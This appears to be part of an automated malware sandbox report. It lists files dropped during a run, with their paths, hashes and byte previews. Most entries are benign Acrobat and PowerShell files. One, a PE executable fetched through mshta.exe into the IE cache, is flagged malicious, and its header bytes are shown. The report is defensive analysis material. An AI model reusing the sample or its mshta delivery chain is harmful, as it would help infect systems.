                                                                                                                                                                                                                                              SHA-512:0F27D0903F062CE0BB9F0D3D2A673BA3BD811DF4278579554611D347102C85C45EF63A6D34AD11B851F3A1C9C163077C5387C6C7616640CB16F56553956E62C2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):287
                                                                                                                                                                                                                                              Entropy (8bit):5.2562692193870015
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJf21rPeUkwRe9:YvXKXcKiYpW7aZG+16Ukee9
                                                                                                                                                                                                                                              MD5:C47E7B6F8C7F812EA5BC2D2850680B5D
                                                                                                                                                                                                                                              SHA1:7174807C87C315C4776C8C4839F72DF035CBD495
                                                                                                                                                                                                                                              SHA-256:83AF4AB8E39E32A47E85C64506D4A93348CB913FCC4D4D7091534AED49DDB844
                                                                                                                                                                                                                                              SHA-512:46ED74DD3DECD92ECF153636498C26D7BC5250388545022C1E363E65E05175E616BF22EA902984B96DBF547481AFDD220517C46A8F53493722723A323B9B8C88
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1090
                                                                                                                                                                                                                                              Entropy (8bit):5.65651950679487
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:Yv6XcKniaiamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSSL:YvnKi7BgkDMUJUAh8cvMSL
                                                                                                                                                                                                                                              MD5:9C33438103E194517F8D56D80B9E5759
                                                                                                                                                                                                                                              SHA1:675AB9E1D34F26D3564F5C5A514E72FFDA63DDA9
                                                                                                                                                                                                                                              SHA-256:6F6F9572FA6D9DA4F7C5762C1C0BE51F0911E12F3591D3654C97FC41054F7862
                                                                                                                                                                                                                                              SHA-512:8F209E19AA8F1AE15DED3142243253CB22F687B62BE6732DC842C6942C088DBA74FC6C7475BAAC24862E76DB1A7C10CFE23A96BAE6F53F7F850197243EFDB8DC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):286
                                                                                                                                                                                                                                              Entropy (8bit):5.23020592265918
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJfshHHrPeUkwRe9:YvXKXcKiYpW7aZGUUUkee9
                                                                                                                                                                                                                                              MD5:DC9512FE166AADFB93FFF4A021C966E4
                                                                                                                                                                                                                                              SHA1:EE2D5013B6FB995DEC812EB045C47DDBB5285719
                                                                                                                                                                                                                                              SHA-256:78F042098F58F2E8511FFE9FFB4B8E55EC3C86CBAFBBEFFE0067778A6E7D7545
                                                                                                                                                                                                                                              SHA-512:D7D3F9F5130130F5326DA5D75DC4291F862323D31DE9ADB338AAB9266971F1C227A0709FC3A85C44C05839A19D2E0F6A61F78A09024E0B67B9F0255757D794BC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):282
                                                                                                                                                                                                                                              Entropy (8bit):5.248102411198653
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJTqgFCrPeUkwRe9:YvXKXcKiYpW7aZGTq16Ukee9
                                                                                                                                                                                                                                              MD5:83F13773AEE915EC66787B7BA875D3B5
                                                                                                                                                                                                                                              SHA1:7A5750227A9A6699B68318DF3083004A01A43BC9
                                                                                                                                                                                                                                              SHA-256:F8C5053DD66A44F604E630877AD5BF39A5A1F52EA12CC10C68583821F9C2CFD6
                                                                                                                                                                                                                                              SHA-512:1B2344C441E30A9F6C6F7F01E1FEBF74685088E0D918DE103171C32B0CFD3E628D4552D9FA03C522B49E0B1BB78F35B6E30135E32DBA895EEA38C1DF44229EE6
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                                              Entropy (8bit):0.8112781244591328
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:e:e
                                                                                                                                                                                                                                              MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                                                                                                                                                              SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                                                                                                                                                              SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                                                                                                                                                              SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:....

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2814
                                                                                                                                                                                                                                              Entropy (8bit):5.1426181114779
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:YU14aFJBayDRMy9zAGmACooju2j0SM2Tk2Mn2LS+Cj7X5bmMyXgn5o5zb9WuTvOG:YUVl9cXxFUpns8XEMy8Cn93b
                                                                                                                                                                                                                                              MD5:E1056373F571058A98CB598D08D5D185
                                                                                                                                                                                                                                              SHA1:88D3CC68F9DE54FB21EB3883DC89B52D68B6E89F
                                                                                                                                                                                                                                              SHA-256:C38F56B176B6B887F9DB942EE0C7C625E1B70C48679EB2305D33B70D0FBAF8C6
                                                                                                                                                                                                                                              SHA-512:364918FBBA3EC48CEF87224833AC93CE3AFAE03BEEB8FEA7A86EA02B00C5C6E416C902E214F0E66B77962EB9356865684111731B662C852F901B80F6C21A08DC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"1d934eb09cef772ef77bc7857d13a625","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734789561000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"79d2716bd6f068ef769707ef613cb939","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734789561000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"53cfe998c4c4c2331901f5c22ee94350","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734789561000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"e00a8bdb50c4a72e2f82c5e8ad2e92ff","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734789561000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"ce17abf8707838ccd13036f3744b40d8","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734789561000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"47b0bd4c9ec924ecd494e932995a1623","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                                                              Entropy (8bit):0.9848440404416242
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/SpgzI44zJwtNBwtNbRZ6bRZ4FzI4F:TVl2GL7ms6ggOVpg87zutYtp6PS8k
                                                                                                                                                                                                                                              MD5:872B25F8933D57B4AB3C90C37E12C9BC
                                                                                                                                                                                                                                              SHA1:0966FA0FC81B24D6B7BD192A71F8D496CAF847B3
                                                                                                                                                                                                                                              SHA-256:F5C0A93C76AEFC4533F69BBA4336BFECB2138FBD1B360C439E2557F7345A63AB
                                                                                                                                                                                                                                              SHA-512:8CF00DDD5E3473F4978C8D84F79394854756E77DCAEF6C467ABE389A61F5A952319992327AF9B6003AA3D6DB9DFD0276128C12B440D2D1CB3D461A0F1AA0DC4B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:SQLite Rollback Journal
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):8720
                                                                                                                                                                                                                                              Entropy (8bit):1.3388355356906936
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:7MrvGgOVpg8EzutYtp6PMeqll2GL7msa7:7SpOVpgAaIqVmsa7
                                                                                                                                                                                                                                              MD5:7FED385D5524A2BE9240A522D5760078
                                                                                                                                                                                                                                              SHA1:6CB2B141B5862406F0EF7E33237D1678A6141CC5
                                                                                                                                                                                                                                              SHA-256:7D5F0A83811DBDB6CA294A09CC2948522D9ADB3B8FE3BF322DA1C7ADA09F0390
                                                                                                                                                                                                                                              SHA-512:E5492DA3179FE05E5F103352FB5CC3FC8C6CE410EA1A10C85A78C97F9EECE9C5823C3FFA86077F0B022520C852CC3F5D8B6729F9CEC6CD9485A959D0BA36EECD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:.... .c......\.m......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):66726
                                                                                                                                                                                                                                              Entropy (8bit):5.392739213842091
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:RNOpblrU6TBH44ADKZEgftH0vvTsKsMk2ftkAvPbnmCwmXyYyu:6a6TZ44ADEftUvvTsKG2fsTmiK
                                                                                                                                                                                                                                              MD5:D0B5764A990AC33FE59D71DA3F88FDCD
                                                                                                                                                                                                                                              SHA1:25E8738D36756AD5DEA246DF2EE400C62115E4EE
                                                                                                                                                                                                                                              SHA-256:67578B674468DA8E483854008B63003C4EE2F2614F217E2FB45A082FE660C30C
                                                                                                                                                                                                                                              SHA-512:036740B4938EBD8E3CD0C9241B2B19BB2132BF9A56A9869015D98FDDAB28C0A4B9012CD5792A15C658177E7E393CD508458080F8733D29782DA82526B5245A98
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\documentcomplie[1]

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):473509
                                                                                                                                                                                                                                              Entropy (8bit):6.338680344547592
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:e+WoC/IdkUPq5l+WoC/IdkUPq50+WoC/IdkUPq5w+WoC/IdkUPq5E+WoC/IdkUPO:epOkVpOkkpOkgpOk0pOk
                                                                                                                                                                                                                                              MD5:76A62CFF0EC3A74D0F3640231BDA7CD7
                                                                                                                                                                                                                                              SHA1:F193D6F36AC2CD410C3E23A0D10DC489B77F7281
                                                                                                                                                                                                                                              SHA-256:CE8D61E9470CB0A16887540D38B463D0D23764770BB49E738600575A2D560012
                                                                                                                                                                                                                                              SHA-512:F42303203828E60AF3A49293176A7D17B261881DA8A22862E17944DE6E6C318EF6F1F22DDD4196A3273FB5D3077F5479875B8EFBA413A3989F7713A4025C8503
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3...3...3...C...3...C...3...C...3...C...3...3...2...C...3...Cw..3...C...3..Rich.3..........................PE..L...........................T....................@.................................{.....@...... ..........................P$..,....`..(....................p.......1..T............................................ ..L.......@....................text...X........................... ..`.data...............................@....idata..D)... ...*..................@..@.didat.......P.......4..............@....rsrc...(....`.......6..............@..@.reloc.......p.......B..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):11608
                                                                                                                                                                                                                                              Entropy (8bit):4.890472898059848
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                                                                                                                                                                              MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                                                                                                                                                                              SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                                                                                                                                                                              SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                                                                                                                                                                              SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:@...e...........................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\MSIed412.LOG

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):246
                                                                                                                                                                                                                                              Entropy (8bit):3.5209238895127717
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8d0lcow:Qw946cPbiOxDlbYnuRK+ow
                                                                                                                                                                                                                                              MD5:171ACDB7A716E6ECC79D03D00D27D59B
                                                                                                                                                                                                                                              SHA1:051948B093F18AC259E315FCA6E1ED02B1CA684E
                                                                                                                                                                                                                                              SHA-256:D592EBC8373B3900973CA476DDE0A24CC79E6A1D7C2E1E1A2A4F72AC2E235185
                                                                                                                                                                                                                                              SHA-512:0FF9F1F0EBF6DA3BD858A534F108DA5634E7015D50FC93C12C2D2E0BB6C9D22C7C12DBFC6132DD82A92C0E18CCC07C5CCAAEF5FDD2D6A439973D201815E0C711
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.1./.1.2./.2.0.2.4. . .0.8.:.5.9.:.1.9. .=.=.=.....

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4l0fb0ep.ktw.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bav2tqbe.jfe.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f1scms5i.5xv.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ue0gxfew.ypg.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

